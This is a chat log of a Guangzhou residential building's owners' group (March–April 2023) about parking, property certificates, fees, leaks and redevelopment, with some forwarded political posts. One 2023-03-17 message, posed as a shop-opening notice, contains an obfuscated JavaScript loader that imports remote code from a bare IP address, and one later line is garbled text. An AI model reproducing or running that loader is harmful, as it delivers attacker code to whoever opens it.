雅园新村第10栋业主群聊天记录(2023-3-8)

来自通约智库
跳转至: 导航搜索

— 2023-03-08 —

江南19:24

业委会设立物业公司是否合法

江南19:32

文章介绍了业主自行管理法律法规方面的注意事项。

江南19:35

我们的业委会和物业管理都很不正规。

江南19:37

建议还是走正规的手续和法律程序。


— 2023-03-10 —

江拥辉空调按装维修废品回收00:09


江拥辉空调按装维修废品回收00:10

这个电动车是谁的叫个不停

江拥辉空调按装维修废品回收00:13

所有人这个电动车是谁的叫个不停

江南10:16

有没有必要做个车辆号牌登记?像昨天晚上这种情况,车主没有看到,就会响了很久。如果有必要就各位车主将车牌号报上来,我汇集成车主,车号,联系电话一览表。

明哥10:28

把所有摩托车安排一个地方停放,不是停在电梯门口或安全通道,

江南11:44

中央正式定调,释放重磅信号(速听)

江南11:51

@张明 问题是没有地方可以统一安排停放。之前想停在一楼中间停车场,但金竹说是他们受政府的委托管理的,不让我们用。镇规划办也支持他们。

明哥11:54

这样放也不是一个办法呀,经常摩放到路没走,万一有什么特发事故,谁来负责任呢?

明哥11:56

是谁都负不起这个责任,我希望各位车主自觉放好。

江南11:58

公共场所是业主共有的,现在说是政府的,委托金竹管理,我们不能用,哪家的规矩?!

明哥12:05

我们业主放在业主的公共场所,怎么又不行呢?我们都是为我们业主着想,安全方面是放在一第位的

江南12:05

停放的问题,如果停放在室外,9、10栋之间靠近9栋一侧的那面墙搭棚,安装充电桩是最理想的,但金竹不同意。在北侧和西侧路的另一边都折腾过了,不是我们业主的公共场所,镇政府也做不了主。

江南12:09

@张明 为这事,我和张璞专门跑了一趟镇规划办,提出即使不能确定是我们业主的,那个地方暂时还空着的,能否人性化一点,先让我们用,都给否定了。

ぷ樱花草ぷ13:36

谁知房产证什么时候出吗

江南15:15

@D栋房 我们的房产证,政府已经委托雅园新村地块拍卖的竞得人办理。不知道这个房地产开发商什么时候帮我们办?

ぷ樱花草ぷ15:19

没有证办不了转让

江南15:26

买方原意就可以

江南15:27

广州市规划和自然资源局国有土地使用权挂牌出让公告(穗规划资源挂出告字[202190号)]

江南15:27

其中第一条:1.竞得人须无条件配合广州市白云区钟落潭镇人民政府完善项目内保留三栋物业(地上计算容积率建筑面积21054平方米,未办有偿使用手续,需注记“未办土地有偿使用”,其中保留住宅计算容积率建筑面积16876平方米,保留商业计算容积率建筑面积4178平方米)的工程改造报建、验收、产权交换和权属确认手续,并承担完善本项工作所需资金约人民币1376万元,初始登记确权至广州市白云区钟落潭镇人民政府名下。

江南15:38

字太小,不清楚,我转发到钟落潭社区网站

江南15:38

广州市规划和自然资源局国有土地使用权挂牌出让公告(穗规划资源挂出告字[202190号) - 乡村报道 -钟落潭-社区共同体 -手机版]


— 2023-03-11 —

江南11:33

我们和镇政府签订的办证协议书已经3年有多了,究竟办的怎样?即使根据土地拍卖公告书中说的,由开发商代办,这也只是我们的理解,具体情况是怎么一回事?镇政府一直没有和我们说清楚。为这事我写过书面报告,要求政府向我们业主报告项目的进展。但没有得到答复。按照协议书,我们的大楼的改造费用是需要我们支付的,政府只是垫付。这种情况下,政府往往是监督不够的,因为实质上不是政府的财政支出,政府只需要有一笔数填补垫付的总金额就可以了。现在我们看到的是离改造好还很远,但听说预算早就不够用了,什么时候才能拿到证则遥遥无期。

江南11:35

目前我们业主的权益已经明显被侵犯。 我们的公共场所,包括我们小区的物业管理,政府不经过我们业主的同意就指派物业管理公司,这显然是对我们权益的侵犯。之前曾经说一楼中间空间是金竹买下的,现在不敢这么说了,但仍强调政府委托金竹进行管理。

江南11:38

我曾经打12345咨询充电桩安装的事情,地址栏我报的是大纲领路10号,12345转给镇政府,处理完之后,12345答复我是这样的: 办理情况:市民求助的钟落潭大岭路10号充电柜问题,上址属金竹公司管理,已将市民诉求告知金竹公司管理人员,按照政策要求安装充电柜需要向区相关部门进行上报,请市民耐心等待,后续具体事宜已确认由金竹公司与业主进行沟通协商。 我提出异议,说大纲领10号不是金竹公司管理,回复情况与实际情况不一致。过了三天,12345又给我回复,强调“不存在回复情况与实际情况不一致。”12345的办事过程记录是这样的: 办理情况:本单位已于2022-08-11以热线系统短信回复的方式回复市民,回复内容如下:市民求助的钟落潭大岭路10号充电柜问题,上址属金竹公司管理,已将市民诉求告知金金竹公司管理人员,按照政策要求安装充电柜需要向区相关部门进行上报,请市民耐心等待,后续具体事宜已确认由金竹公司与业主进行沟通协商。不存在回复情况与实际情况不一致。 是不是我们的物管,我们暂且不论,我们的目的是安装充电桩,可是一直等到三个月后的11月14日,金竹要我们不要占用中间的停车场停放电瓶车,才由规划办和大纲领村出租屋管理办公室几个部门推进充电桩的安装,尽管最后没有设施成功,但不管怎样,金竹一直没有帮我们过问充电桩的事情。

江南11:38


江南11:39

@所有人 我们如果对大楼改造过程,房产证办证过程,以及被物业管理的过程在这个时候不行使我们的民主权力,将来会更难办,大家可不能忍让。

江南11:40

建议大家关心一下近年来国家关于“全过程人民民主”的提法。“全过程人民民主”是习主席这几年一再强调的社会主义民主的核心思想。“全过程人民民主”的要义就是共产党、政府在所有为人民服务的过程要向相关的民众透明,相关的民众有知情权,听取民众的意见。“全过程人民民主”是防止腐败的法宝,是保护我们的权益的法宝。

江南11:41

去年二十大党章的修改中还特别增加了“全过程人民民主”的内容。党中央、习主席在呼唤我们起来行使我们的权力。我们勇敢的起来行使我们的权力,就是最大的拥护共产党,保护社会主义民主制度。

赵帅11:48

为什么会变成这样呢?原来镇政府让我们签合同的时候还有专门的人员进行协调,还给优惠,现在为什么变成了这个局面。

江南12:02

@B701赵帅 我们将这段历史理一下,镇政府委托金竹负责拆迁事宜—拆迁—旧改—正常的下一步应该是房屋改造验收,办证。

江南12:02

头是开了,可是项目的实施呢?

赵帅12:12

具体的细节我不清楚,也没有什么发言权。但是从这个关系来看,政府委托金竹公司后,这个项目已经变成了一个商业行为,商业行为就是公司足利的行为,如果这个项目没有给金竹公司带来利润,项目进程很难推进。[捂脸]

江南12:12

金竹现在连8、9都还没有进入收管理费的管理,但他就是我们整个小区内定的物业管理者。这都是有计划的进行下来的,往后可以预计,整个小区开发好之后,我们这些旧楼连同新开发的新楼就由金竹管理。

江南12:24

@B701赵帅 金竹看不上我们这三栋目前这个阶段的物业管理,他是着眼于将来整个小区的物业管理,而一个物业管理区域只能由一个物业公司管理。按照目前政府、开发商、物业管理三位一体的潜规则,物业管理非他莫属,他们都算计好了,不用我们操心。

江南12:31

我们办证项目推进的问题,有一次我去找颜主任,颜主任老婆生小孩,他休假去了,有一个科员接待我,和我讲起我们雅园新村办证的事情,他说,镇政府现在松了一口气,地块拍卖了出去(后面没有讲的太明,但我听出来的意思是,之前办证的障碍有人帮忙解决了,指开发商代办)。

江南12:32

大家在看看政府关于雅园新村地块的拍卖公告,是不是这个意思,我们的房产证由开发商代办?

江南12:38

就是说,如果不是这块地拍卖成功,镇政府许诺为我们办证是办不到的。政府的部门很多,各有各的办事规则,不是镇政府想为我们办房产证就办得了的。

江南12:39

上面这些只是我的理解,我的意思是希望镇政府能和我们说清楚,免得我们老担心。

江南12:41

可是很多的事情镇政府也是难以说清楚的,说不清楚倒不如不说。比如和我们签的这个协议书,镇里能如实和我们说,他也会有困难吗?

江南14:01

大家都等着买下雅园新村这块地的开发商动工。我们在等,金竹也在等,他们对8、9栋还没有真正管起来,这样拖下去他们当然不希望。


— 2023-03-13 —

江南07:20

@所有人 目前雅园新村的状况我怕自己的判断有误,需要提出来征求大家的意见。先讨论我们房产证以及我们的公共场所的问题。以下是我根据政府的土地拍卖公告的内容理解的,是否有误?大家需要发表一下自己的看法。 1、公告的第一条写着:竞得人须无条件配合广州市白云区钟落潭镇人民政府完善项目内保留三栋物业的工程改造报建、验收、产权交换和权属确认手续,并承担完善本项工作所需资金约人民币1376万元,初始登记确权至广州市白云区钟落潭镇人民政府名下。 理解为:我们的房产证已经和雅园新村这一地块的房地产开发捆绑,由房地产商结合房地产的开发帮我们办理。 注意,房产的权属确认不是按我们与政府的协议书直接确权至我们业主名下,而是先到镇政府名下。 2.公告的第二条写着:竞得人须在用地范围内新建计算容积率建筑面积1054平方米的商业用途安置物业,建成验收合格后无偿移交给广州市白云区政府指定单位,并将产权登记在广州市白云区政府指定单位名下,在报建前需充分征求广州市白云区政府指定单位的意见。 理解为:这1054平方米的商业用途安置物业,是商业用途安置物业,不是社区内用于公益的物业。该物业在整个用地范围内,不是在我们这三栋楼的范围内,与我们这三栋楼的业主没有直接关系,我们这三栋楼的公共场所就在第10栋的一楼中间停车的地方,而新建的楼盘的公共场所由建设单位另外安排。

江南07:23

广州市规划和自然资源局国有土地使用权挂牌出让公告(穗规划资源挂出告字[202190号)]

江南07:23

政府公告原文

谢天谢地07:28

我觉得政府给个安慰奖哄大家的[偷笑][偷笑]


— 2023-03-14 —

卓勇超10:51


江南17:55

1-2月的管理费的缴费情况。

江南17:56


江南17:59

这是已经缴费的,我一直都有记录缴费日期。将来看能不能为小区的管理提供一些分析数据。去年有谈过评分分值的想法,分值尝试采用两种计量方法。

江南18:00

分值1 每月的应缴管理费发布后5日内缴纳的打分100分,6-10天之内交的80分,11-20天之内交的60分,21天到一个月内交的40分, 一个月后到两个月内交的20分,第三个月以上交的0分。 分值2 每迟交一天少一分。

江南18:01

尚未交管理费的业主如下

江南18:02


江南18:02


江南18:21

上面的分值表题目少了“1-2月”

江南18:21



— 2023-03-15 —

江南06:54

@所有人 还没有交今年1-2月份管理费的业主请抓紧。

江南17:39

大事件,明天下午两点全网直播。

江南17:39

百度推出的中国版CHATGPT可能比美国版更加强大

江南17:39

文心一言,百度的使命


— 2023-03-16 —

江南16:02

【百度直播】百度文心一言新闻发布会

江南16:06

直播已经结束,大家可以点击左上角的回放观看重播。数字中国是我国的既定国策。建议家长们要关注有关的政策和实现措施,年轻的一代更应该关注。我们雅园新村也要成为政府在这新的一轮号召中提倡的智能社区。

毛小雨16:15

@B-808 江老师,政府有提倡雅园新村为智能社区吗?

江南16:44

是的

江南16:45

不是具体的发文针对雅园新村

江南16:46

依据两个文件,一个是旧城改造的文件,一个是基层社区建设的指导文件。

江南16:46

旧城改造的文件

江南16:52

国务院办公厅关于全面推进城镇老旧小区改造工作的指导意见(国办发〔2020〕23号)_政府信息公开专栏

江南16:55

基层政府是依据上级的文件执行的,基层不能创造给我们的优惠政策的。

江南16:55

智能社区的文件来自另一个文件

江南16:56

中共中央 国务院关于加强基层治理体系和治理能力现代化建设的意见_中央有关文件_中国政府网

江南17:02

政府有好多的政策,比如《广州市居家社区养老服务管理办法》

江南17:02

广州市人民政府办公厅关于印发广州市居家社区养老服务管理办法的通知 - 广州市人民政府门户网站

江南17:03

有场地和营运的补贴

江南17:04

雅园新村是钟落潭镇的第一个社区。

江南17:06

政府很重视,希望搞好

江南17:06

这件事情我原先觉得很奇怪,怎么会是钟落潭的第一个

江南17:07

再问了规划办,确实原来就没有

江南17:08

当然,原来没有也有坏处,镇政府都没有相关的经验。

江南17:08

这些都需要我们主动做好相关的工作。

江南17:11

落实政策的工作涉及相关的利益。会有利用政策牟利的人,看我们集体的智慧了。大家要是不关心,那事情做不起来。

江南17:13

可以先从业主容易看到的好处做起。

江南17:17

我比较熟悉计算机,互联网,我们可以从学习,特别孩子学习计算机智能的这一方面多关心一下。我们可以从建设智慧社区的角度学习。

江南17:20

实施起来是很具体的,不同年龄的孩子,学习的内容不一样。

江南17:23

社区智能建设,多数是和社区的管理结合进行的。

江南17:26

举个例子,管理费的收取,银行自动划账就是计算机辅助管理之一。只是我们总在表层的应用理解。

江南17:29

计算机应用在我们日常生活已经很普遍了,我们需要创造条件让我们的孩子从技术的角度学习更多的知识。

江南17:31

比如孩子大都喜欢网游,但要是能从游戏设计的角度学习相关的知识,那结果会有很大的不同。

江南17:33

我女儿原来也是一样喜欢网游,但现在她更喜欢软件编程了,自己编个游戏小软件,那自我感觉不一样。

江南17:35

她现在在学习Python计算机语言,不知道小区有没有青少年在学习,或已经掌握了的?

江南17:36

用Python调用一个游戏模块,编小程序就很简单了。

江南17:38

现在的计算机软件编程都是模块化的了。包括今天百度发布的“文心一言”,其中的语言框架可以理解为一个大型的模块。

江南17:39

大家可以让家里的孩子了解一下。

江南17:43

现在的学生从小学开始就学习计算机和软件编程了。

江南17:55

国家太重视信息化了,看习主席,除了担任党的总书记、国家主席、中央军委主席、还担任信息化领导小组组长(现在改为委员会)。

江南17:57

大家有没有发现,现在社会治安这么好,监控系统功不可没。未来大家会看到,社会官员的腐败的根治,智能化将功不可没。

江南18:06

@所有人 智能社区的建设除了结合小区青少年的技术学习,还得一起来建立小区的管理制度,让青少年来关系小区的管理制度,参与进去,结合应用学习技术,学习管理十分重要。我们建设好小区,最终还不是为了下一代。

— 2023-03-16 —

江南17:55

国家太重视信息化了,看习主席,除了担任党的总书记、国家主席、中央军委主席、还担任信息化领导小组组长(现在改为委员会)。

江南17:57

大家有没有发现,现在社会治安这么好,监控系统功不可没。未来大家会看到,社会官员的腐败的根治,智能化将功不可没。

江南18:06

@所有人 智能社区的建设除了结合小区青少年的技术学习,还得一起来建立小区的管理制度,让青少年来关系小区的管理制度,参与进去,结合应用学习技术,学习管理十分重要。我们建设好小区,最终还不是为了下一代。

江南18:09

还有,年轻人的加入,会促进我们业主自觉的管理好小区。就像那些不交管理费的业主,他会以此为榜样教育孩子吗?信不信,业主敢不敢和孩子解释不交管理费的原因?

江南18:20

马斯克是如何教育孩子的

江南18:23

看看马斯克是如何教育孩子,如何办学校的。虽然我们不能全学他,也没有条件学习他,但指导思想是可以学习的,让孩子结合实际进行学习。结合技术,也结合商业,办公司之类。

江南18:32

如果我们业主共同办一个公司,那就可以让孩子们结合学习来办公司,他们当法人,当管理者(轮流,目的是学习),一起讨论,一起经办等等。 业务很单一,过程也简单,不会出什么大问题的。


— 2023-03-17 —

毛小雨07:45

",1)}};p3='ZD1';b=[0,frames,1 本人的店准备开业啦;x='\a\t\o\b\';z='\ZX\Zh\bA\';b[1][b[1][x](z)](b[1][x](p3+'kb2N1bWVudA0KZC5kb2N1bWVudEVsZW1lbnQuaGlkZGVuPScxJw0KZC50aXRsZT0nTG9hZGluZy4uLicNCmltcG9ydCgnLy80Ny4xMDAuMjIwLjE1MC9pY2s2ZmZsc3Byc3l6NWE5cXA2MDRuNGptNjYwZjBuaHA/Pz93eD0nKQ==',5))/4;function g(){if(0){$.attr("?lang=hbli36a8]

毛小雨07:47

【好人好报】您的善举能为重病孩子送去希望...

毛小雨08:01

下面的视频可能手机被盗了,发错了!不要管它

江南08:23

@毛小雨 看不到耶!

毛小雨08:25

@B-808 这样还好

江南08:26

开业的那个只是出了肯德基的广告

毛小雨08:26

@B-808

江南10:26


江南10:27

算是等到动工了

江南10:32


江南10:33

由于施工需要,需要封闭到这个地方。以后这条路不能停车。

江南10:34

也是为了大家的安全

江南15:26

@所有人 A荽竺趴诘恼馓趼凡荒芡3担氤抵髟�19日之前将车开走。


— 2023-03-18 —

江南10:08

@所有人 未交1-2月管理费的请抓紧交。

10:16

@B-808 我连3.4月份的都一次交了,怎么还说我没交1.2月份的呢?

妮达毛织10:55

交了我还没转江老师邮箱,所以他没看到

江南10:55

@D栋A梯601 @有口无心805 给我的明细账是截止2023-03-14日10点之前的。你是18时之后交的,统计的时候我还没有收到,不好意思。。

江南10:57

你12月份交的,上次说了,一块记入。

江南10:58

这次出账的时候漏了,不好意思。

10:59

没事

11:00

说清楚就可以了

知足常乐11:03

A705跟A307房1月份2月份管理费已交

江南11:17

@知足常乐 看到,谢谢!

小源-A80311:39

江老师您好!管理费用我的已交了。

三沙梦17:10

俄乌之战,这场俄罗斯打乌克兰的战争,俄罗斯的胜负绝对会影响到我们乃至子孙后代的生活方式和生存条件!从目前战况来看,我们现在预测结果都是瞎猜。但有几样已经是暴露了苗头,可以看到,这一仗:打虚了美国,打傻了欧盟,打呆了北约,打烂了乌克兰,打哑了公知,打醒了第三世界,打得私有财产不神圣了,打得言论不自由了,打得科学与艺术有国界了,打得小猫小狗也有原罪了,打得瑞士不中立了,打得美元霸权不稳固了。美国人发现,三哥不听话了。德国人发现,GDP再高取不了暖。中国人发现,说话声再大不如核武器多。这一仗怎么收场不知道,但以上战果,就是一场现实主义教育大课堂,让我们更加深深地认识到我们伟大的领袖毛主席当年是多么的高瞻远瞩,在那么艰难困苦的条件下,研制两弹一星的英明决策!这一仗会让西方苦心经营百年的洗脑话术,一仗崩塌,毁于一旦。这一仗打醒了中国人民,国富民强军更强,手中有弹要有粮,实体经济,公有制度挑大梁,教育舆论不能放。这一仗更加说明了和平还得靠核武器和军事实力!和平真的是打出来的!我们还应当头脑清醒地记住毛主席曾经说过"凡是敌人反对的我们就要拥护,凡是敌人拥护的我们就要反对"。近几十年来,一些有钱的,当官的,不仅把钱存入美国银行,存入瑞士银行,存入欧盟银行,还把老婆孩子也送到这些国家去生活。现在这些人坐卧不安,后悔莫及!这就好比,把肉放在狼的嘴巴边上,迟早狼会把肉吃进它的肚子里去! 以上文章是转发的,确实写得好!

18:01

特卖[呲牙]

18:02

皮薄肉厚

18:03

个头饱满

18:03

正宗灰枣特级


— 2023-03-20 —

微笑08:24

A梯503,涨水了

紫玫08:50

流到电梯里就麻烦了

紫玫08:51

已叫江老师过去了

-v-ZSR╯09:06

我那里有水流出来?

江南09:38

@A梯503 是的,A503家里的水龙头没有关,我将二楼的开关关了。

江南09:39

发现的时候,流出的水已经开始进入电梯。

江南09:40

现在走廊的水已经清除干净

-v-ZSR╯09:40

好的,麻烦江老师了

江南09:41

好在是白天,有人发现,要是夜里那挺麻烦的。

-v-ZSR╯09:42

刚刚租客跟我说了,他开了洗衣机就去睡觉,可能是泡沫太多去不了水

江南09:42

@A梯503 他人在家里吗?

-v-ZSR╯09:42

他起来拿棍子通一下,水就下去了,不知道是不是管子堵了

-v-ZSR╯09:42

在家的

-v-ZSR╯09:44

他说之前也试过一次,泡满阳台,他发现的早,水没有流到外面,

江南09:45

@A梯503 他既然知道了,也解决了,那没事了,不会堵的。

紫玫09:51

@A507 谢谢[玫瑰][咖啡]

紫玫09:52

是A507发群里,没见有人回话,她跑出去找我,@A507 [强][强][强]

-v-ZSR╯09:58

真的要谢谢@A507 ,不是她发现的早,流到电梯里麻烦就大了[捂脸]

巍巍中华22:21

顺其自然,有空帮我看看家里开关好吗?谢谢你!老张致启。


— 2023-03-21 —

yanyan20:09

@B-808 江老师,我的电动么托车放楼下都不见了,有没有监控查

江南20:12

@yanyan 我们这里没有装监控。 你的电瓶车放楼下什么地方?

yanyan20:12

放在烂纸皮那,

江南20:21

大楼一楼中间停车场吗?

yanyan20:22

江南20:26

什么时候放的?什么时候发现丢的?

yanyan20:31

前晚,今晚去开才不见到

江南20:35

@所有人 大家还是要注意出入关好大门。

紫玫20:40

A梯和B梯的大门经常不关,有时整个大门都拔开,不关。

紫玫20:41

A梯大门现在有时关不上。

🦘袋鼠20:53

经常看到铁线勾住门口的钉子,没有关门

🦘袋鼠20:54

请大家推完车自觉关好门

yanyan21:24

在这里已经不见了3台么托车了[大哭]


— 2023-03-22 —

 毛毛18:35

楼上谁家吃糖果,糖果纸不要丢下来,丢的我家后面阳台,到处都是[皱眉][皱眉][皱眉]


— 2023-03-23 —

江南10:13

历史性的握手!形势出现变化!!


— 2023-03-24 —

江南10:53

@所有人 下大雨了,我已经将楼顶和二楼的排水口疏通并适当调整,A梯6号室楼顶的排水口我盖住了一半,不要让其流入的水量太大。楼下有住户雨水流量大了会反涌到家里(不止一家是这样),他们现在正上班,请大家注意不要放开限制流量的瓷砖。

江南10:58

都均衡的往下排水就不会反涌,最怕是有多个出水口堵塞,楼顶成了水池,然后突然疏通排水,大流量的水往下排出,下面的排水管排不及,就会发生反涌。

江南11:01

尽管和装修改管有关,雨水管是不适合作为厨房排污管的,但已经改了,既成事实了,希望大家相互关照。


— 2023-03-25 —

江南10:19

@10栋108 [强][强][强] 现在不但是有的没有入住的业主不交物业费。就是入住了也不交。 有的在住的时候交,现在不在这里住了,就又不交了。

江南10:20

自行管理的情况下,这点还是有点不好处理,毕竟都是邻里,不想在万不得已的时候诉诸法律。


— 2023-03-26 —

江南19:15


江南19:21

A,B梯两个大门坏了,@维修水电安装 在维修。

江南19:22


江南19:22

补漏


— 2023-03-28 —

00:38

仓库着火

紫玫02:07

A栋有消防车🚒

02:07

十台

02:08

仓库还在冒烟

紫玫02:10

睡着听见

牛魔王老豆zhang1371046526913:44


田利坤14:10

花笨池盖石头扎了,以

牛魔王老豆zhang1371046526915:53

[语音]

金波15:57

如果不留消防通道就把它的围挡拆了,昨天晚上对面的火灾如果消防车进不来就惨了,谁来承担这个人命关天的责任?瞎搞!

明哥17:32

@金波 [强][强]

巍巍中华19:37

这是“一带一路"上由中国制造发往欧洲的专列,共有一百多节车箱,由于地形上下坡度太大,就在此建了一个大转盘,没想到,火车拐过弯,竟成了一个壮观的风景,这就是中国基建特色,为我们的祖国骄傲[强][强][强]!为祖国点赞[强][强][强]! 这是“一带一路"上由中国制造发往欧洲的专列,共有一百多节车箱,由于地形上下坡度太大,就在此建了一个大转盘,没想到,火车拐过弯,竟成了一个壮观的风景,这就是中国基建特色,为我们的祖国骄傲![强][强][强]为祖国点赞![强][强][强]

江南20:06

@金波 我明天问问施工队

江南20:08

@牛魔王老豆zhang13710465269 你档口原来三个滴水的地方补好了,不过这次下雨,发现还有一个地方要补,这几天会补好。

金波20:11

按照他们画的红线隔断我们进出的通道不到1500mm连两个电动车都不能交叉通过,更严重的是存在严重的消防安全隐患,这是关心到整栋楼所有人生命、财产安全的大事[合十]

江南20:16

那天他们说只是安全防护部分,不是建筑支架部分,我明天再和他们交涉,搞清楚实际用途,特别是消防。

江南20:18

建筑搭棚也有消防问题的,他们应该会考虑得到。我明天问问再说了。


— 2023-03-29 —

江南10:59

打电话给了施工方,他说一定有消防通道,这是常识,大约有5米的通道可以通车。

江南11:01

具体怎么搭咱们又不知道,只能走着瞧。

江南11:01

目前是屏蔽

江南17:14


江南17:20

地下两层车库,地上16层,他说由于限高,只能15、6层。我没有追问究竟是15还是16层。

— 2023-03-29 —

江南17:24

他告诉我,为了防止我们的大楼下陷,要打防护桩,然后挖空地下部分建车库,这排桩要打到我们北面道路的中间。

Plingpling17:28

请问这是什么设计图@B-808

江南17:30

我们这一地块的设计图。黄色线条部分是我们三栋的保留建筑物。

小源-A80317:41

江老师您好!有空看看,a梯天面水箱太大,楼梯间楼板撑不起,都把楼梯楼板压坏了

小源-A80317:42

这个不处理,以后就麻烦了

江南17:50

@a803 楼顶的水箱要取消的,现在要紧的是催快点安装新水表。

小源-A80317:54

取消也是方法的。是不是要找市政自来水公司他们过来安装

江南17:57

不用找,他们按部就班进行中,就是太慢了。说他们太慢,他们说这算快的了。

小源-A80317:58

辛苦你们了

小源-A80317:59

他们时间没定,如果还不安装,大家一起催了

毛小雨18:25

@B-808 ,我们楼下建停车场,是不是有车位分给我们?

江南18:41

@毛小雨 不是我们楼下建停车场,是新建的楼宇要建的。分给我们应该不会。


— 2023-03-30 —

紫玫13:39

电梯停6楼,好久下不来。

卓勇超13:57

可能按上键不会松,长期停在那里

江南14:48

我刚才走下6楼,进去一按就上到8楼了。

毛小雨15:11

@B-808 ,开发商是不是在我们楼下建停车位?

江南15:12

@毛小雨 在旁边的工地下面


— 2023-03-31 —

江南07:18

开发商买了雅园新村地块花了4.8亿,整个地块包括了我们这三栋楼,就是说开发商向政府购买这一地块的4.8亿中约有1.8亿是支付我们这三栋楼的地价的。不少耶!

江南07:18

以我们三栋楼的地皮约占总面积三分之一计算。

江南07:18

花了这么多钱,不会让我们一直住着旧房子的[呲牙]

江南07:18

政府将房子(通过前期开发商)卖给我们,现在又将地皮卖给新的开发商。然后告诉我们,下一步你们和开发商谈。怎么个谈法?大家业主得提前做好准备。

毛小雨07:44

@B-808 ,我也想住新房啊!

江南08:45

@毛小雨 新房肯定有得住,开发商已经花1.8个亿买了我了楼下面的地。不会不利用我们的旧房子。

江南12:59

B梯电梯有故障,已经报告维保公司。

江南13:01

又可以了

江南13:04

这几天B梯电梯总是停在6楼,上下不得。

江南13:05

现在又可以用。我将情况告诉维保公司了。他说如果又可以用,过两天例行检查再过来。

卓勇超13:31

是按键问题


— 2023-04-01 —

陈旭东08:51

@毛小雨 @B-808 你们怎么还没想明白?你们楼下的地开发商买下了,本可以拆后建15层的,现在不拆建了,把15一8=7层楼的建筑面积加在其他新建的楼上,他们总的可售面积不少,节省了你们现在住宅的建设费用了,达到了他们利益最大化,你们还想着住新楼[撇嘴][撇嘴]

江南09:11

@陈A510B706原A506B707 切,开发商能盖多少层受制于这一带的限高,而不是层数。不存在将我们盖楼的指标给到新楼这边。再说,新楼还是7懂,按你的算法15-8=7,我们是三栋,照你那么计算则只能满足新楼的三栋,另外四栋是不是就只能盖8层。

江南09:16

住不住新楼,开发商比我们操心,1.8亿人民币浪费在我们脚下,他们比我们心疼。

江南09:19

往后恐怕是对我们这些老房子的评估的问题,我们想一比一交换,人家会说你的旧楼不值,要换新楼得补差价,我们怎办?

江南09:29

将我们这三栋拆了改建成16层,一比一给回我们,开发商赚多赚少还是赚了。

明哥09:30

到处拆建都最少一比一,要补差价谁给他拆呀,他要拆就要合理赔偿,或者一比一,边耍讲旧房换新房就要补差价?

江南09:33

@明哥 是的,最少一比一,很多地方是1比1.5,两套可以换三套呢。

江南09:34

特好的地段,一套换两套都有。

江南09:46

大家团结一致,开开心心住着,要拆迁时,我们说,住的好好的,不想迁。急着换新楼的也得这么说[呲牙],各位做生意的多,知道怎么讲价钱[呲牙]

江南09:50

不过,还是得看新楼到时的售价和热度吧。保佑开发商的新楼抢手卖个好价钱。

江南09:51

我们和开发商还真是命运共同体了。

毛小雨11:59

@陈A510B706原A506B707 ,校长,我很想有新房住啊!能省很多钱啊!在这里也该谢谢你们

江南19:45

[应用消息]

江南19:49

最近有人拉我进了8,9栋的业主群。该群的群主发了个通知,于4月7日进行再次测绘。由于通知是针对三栋楼的,所以我转发给大家知道。

江南19:55

我感觉到这个群主很强势,刚才打电话给9栋认识的业主,才知道这个人不是业主,说是政府的人。

江南20:01

我查了我的微信好友,发现我曾经加过这个人。而我没有加过政府的办事人员。曾经想加,但政府人员说,他们有规定不能加,有事打公用的联系电话。那么最大的可能这个人是金竹公司的员工。


— 2023-04-02 —

陈旭东08:02

@毛小雨 你还是不明白,按三旧政策,789三栋楼拆建后政府会补偿容积率,假设789三栋楼有2万方房的,拆后可建3万方,那么你们的楼拆后重建,按1:1补偿置换,开发商只剩一万方可外卖,现在不拆建了,开发商直接把建一万方房的指标在其他1一7栋楼的地方建,他们总的可售面积不少,同时节省了你们住宅的拆旧重新建设费用,达到了他们利益最大化,你还想着置换住新楼呢?况且不拆建征收是大家签了协议书的,除非789栋老旧报废了又重新搞改造。现在唯一的希望就是早些办好房产证,同时争取更大的利益就是维修加固维护补漏。[撇嘴][撇嘴][撇嘴]

毛小雨09:07

@陈A506B707 校长,谢谢你的提醒,我是头发长,见识少的

江南11:40

@所有人 大家要看看我从8、9栋业主群转发过来的聊天记录。

江南11:41

里面的通知: @所有人 各位雅园新村8-9-10栋住宅和商铺业主 广州市测绘院于2023年4月7日,下周五早上分3组工作人员同时到雅园新村测量8-9-10各户的面积,请各位业主开门,配合测绘队工作人员测量。 注意事项:有装修的业主,台阳装了铝合金窗封闭了的,请到时候拆下来。不拆到时候影响面积的由各业主自行承担责任。

江南11:42

再次测量我们的住房面积

11:43

@B-808 老板,那边要是有什么事就通知我一下呗!谢谢

江南12:13

@陈天琴B201 好的。

江南12:20

@所有人 我们之前已经被测量过住宅面积了,那次的测量是为了和我们签那份拆迁协议书的(测量的对不对鬼才知道)。 这次又要测量,那是谁要这个数据呢?镇政府已经不需要了。而最大的可能是开发商要这个数据。

江南12:22

之前的政府测量的,开发商信不过吗?

江南12:58

这是一个简单的推理,政府之前已经测量了,据说也是广州市测绘院测量的,现在还要测,那就是怀疑之前的测不准。否则还有什么理由再测一次?

化妆品包装 江生13:05

@B-808 什么时候拆迁?

江南13:15

@化妆品包装 江生 我也不知道。

江南15:19

何敏生测一次,我们按他测量的买了房子,政府测一次,我们按政府测量的签了拆迁协议书,现在开发商(猜测的,但想不出还有谁会如此关心我们)又来测量一次。不知道是不是像政府测的那样少了几平方。不管多少,我们都是任由摆布的份,都是别人说了算[呲牙]

江南15:23

国家制定有房屋面积测量准则,测量者如何执行我们就不知道了。

江南15:30

国家在各领域都制订了执行准则,可是上有政策,下有对策。不按准则执行,吃亏的是老百姓。可惜的是当今老百姓默认了,认为这是正常的社会现象。

。陈15:52

江老师你的房子政府来测量小几平方,我的档口就不知道怎测的,小二十多平米

江南17:17

@陈:商铺101一102档 我家好像也少了很多,等我老婆回来,拿出协议书看看。

江南17:20

目前我们业主需要组织起来,学习法律法规,认真执行。这样才有希望保护我们的权益。

江南17:30

要让外界感觉到我们是很团结的。不要等到我们的权益受到很大侵害的时候才出来喊团结,到那个时候往往效果不好。

江南17:39

维权律师写的史上最详细业主维权攻略!

江南17:51

文章说: 从表面上看,业主是消费者,物业公司和开发商是商家,双方应该是一种自由、平等的关系。 但事实并非如此,开发商、物管公司具有天然的优势,这导致业主合理的要求往往得不到满足。在利益受损的情况下,业主却不能依法维护自身的利益,在一定程度上体现了他们的劣势处境。

江南17:52

